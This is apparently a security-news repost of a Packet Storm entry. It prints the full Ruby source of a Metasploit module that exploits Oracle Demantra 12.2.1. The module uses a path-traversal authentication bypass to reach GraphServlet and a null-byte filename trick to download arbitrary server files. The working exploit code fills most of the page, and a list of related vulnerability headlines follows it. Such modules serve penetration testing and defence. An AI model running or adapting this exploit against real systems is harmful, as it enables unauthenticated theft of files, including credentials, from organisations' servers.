Security
Headlines
HeadlinesLatestCVEs

Headline

Oracle Demantra Arbitrary File Retrieval With Authentication Bypass

This Metasploit module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By combining these exposures, an unauthenticated user can retrieve any file on the system by referencing the full file path to any file a vulnerable machine.

Packet Storm
#vulnerability#mac#windows#js#git#oracle#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass',      'Description'    => %q{        This module exploits a file download vulnerability found in Oracle        Demantra 12.2.1 in combination with an authentication bypass. By        combining these exposures, an unauthenticated user can retrieve any file        on the system by referencing the full file path to any file a vulnerable        machine.      },      'References'     =>        [          [ 'CVE', '2013-5877'],          [ 'CVE', '2013-5880'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/']        ],      'Author'         =>        [          'Oliver Gruskovnjak'        ],      'License'        => MSF_LICENSE,      'DisclosureDate' => '2014-02-28'    ))    register_options(      [        Opt::RPORT(8080),        OptBool.new('SSL',   [false, 'Use SSL', false]),        OptString.new('FILEPATH', [true, 'The name of the file to download', 'c:/windows/win.ini'])      ])  end  def run_host(ip)    filename = datastore['FILEPATH']    authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet"    res = send_request_cgi({      'uri' => normalize_uri(authbypass),      'method' => 'POST',      'encode_params' => false,      'vars_post' => {        'filename' => "#{filename}%00"      }    })    if res.nil? or res.body.empty?      fail_with(Failure::UnexpectedReply, "No content retrieved from: #{ip}")    end    if res.code == 404      print_error("#{rhost}:#{rport} - File not found")      return    end    if res.code == 200      print_status("#{ip}:#{rport} returns: #{res.code.to_s}")      fname = File.basename(datastore['FILEPATH'])      path = store_loot(        'oracle.demantra',        'application/octet-stream',        ip,        res.body,        fname)      print_good("#{ip}:#{rport} - File saved in: #{path}")    end  endend

Related news

Oracle Demantra Database Credentials Leak

This Metasploit module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass. This way an unauthenticated user can retrieve the database name, username and password on any vulnerable machine.

CVE-2013-5891: Oracle Critical Patch Update - January 2014

Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.33 and earlier and 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.

CVE-2013-5891: Oracle Critical Patch Update - January 2014

Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.33 and earlier and 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution